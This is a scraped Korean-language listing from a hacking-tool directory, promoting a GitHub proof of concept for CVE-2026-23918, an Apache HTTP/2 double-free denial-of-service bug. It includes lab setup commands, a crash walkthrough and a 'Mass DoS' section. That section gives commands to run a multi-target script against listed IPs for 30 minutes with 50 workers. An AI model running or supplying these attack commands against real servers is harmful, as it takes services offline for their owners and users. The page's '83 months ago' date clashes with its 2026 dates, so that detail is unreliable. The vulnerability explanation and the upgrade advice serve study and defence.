Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2026-23918 — Apache HTTP/2 double-free 취약점 PoC (CVE-2026-23918) | Kitploit
도구/GitHubGitHub/rhasan-com/cve-2026-23918
Vulnerability AnalysisExploitationWeb SecurityPenetration TestingLearning & Education
GitHubrhasan-com/cve-2026-23918

CVE-2026-23918

Apache HTTP/2 double-free 취약점 PoC (CVE-2026-23918)

저장소 보기
83개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
웹사이트

CVE-2026-23918: Apache HTTP/2 더블 프리 DoS

CVE-2026-23918 Apache 2.4.66 DoS PoC Python 3

CVE-2026-23918 | Apache HTTP Server 2.4.66 | CWE-415: Double Free | CVSS 8.8 | 2.4.67에서 수정됨

mod_http2(h2_mplx.c)의 이중 해제(double-free) 취약점으로 인해 원격 공격자가 빠른 RST_STREAM 프레임을 전송하여 c1c2_stream_joined()와 m_stream_cleanup() 사이의 경쟁 조건을 유발하고 서비스 거부(워커 크래시)를 일으킬 수 있습니다.


빠른 시작

root@kitploit:~
# 1. Start the lab
docker-compose up --build -d

# 2. Run the PoC
pip3 install h2
python3 poc.py --target 127.0.0.1 --port 8443

# 3. Watch the crash
docker logs -f apache-lab

# 4. Clean up
docker-compose down -v

결과: 서버가 ~30s–3min 내에 SIGSEGV로 크래시됩니다 — 신뢰할 수 있는 DoS가 확인되었습니다.


익스플로잇

파일설명
poc.pyRapid-RST — 빠른 공격, 30초~3분 내에 서버를 크래시시킴
exploits/slow-drip.pySlow Drip — 저대역폭 지속 공격

Mass DoS 사용법

root@kitploit:~
# Create target list
echo "192.168.1.100:8443" > targets.txt
echo "10.0.0.50:8443" >> targets.txt

# Attack 10 targets for 30 minutes
python3 exploits/mass-dos.py --targets targets.txt --duration 30 --workers 50 --intensity 7

악용 취약점

취약점은 다음과 같은 경우 발생합니다:

  1. 하나의 스트림이 c1c2_stream_joined()와 m_stream_cleanup()에 의해 동시에 조인됨
  2. 두 함수가 중복 제거 없이 동일한 스트림을 m->spurge에 추가함
  3. h2_purge_then_destroy()가 스트림을 두 번 파괴함 → 이중 해제 → 세그폴트
이미지

완화 조치

Apache 2.4.67 이상으로 업그레이드하세요.

  • NVD — CVE-2026-23918
  • Apache 보안 권고

심층 분석

전체 취약점 분석, 근본 원인 워크스루, 공격 기법 노트 및 복구 지침: → rhasan.com/CVE-2026-23918


크레딧

발견자Bartlomiej Dmitruk (striga.ai) · Stanislaw Strzalkowski (isec.pl)
보고일2025-12-10
수정 버전

참고 자료

  • CWE-415: Double Free
  • oss-sec ML

⭐ 이 저장소가 유용하다면 스타를 남겨주세요!

스타

Stargazers over time

도구 다운로드
exploits/mass-dos.py
Mass DoS — 다중 타깃 지속 DoS
Apache 2.4.67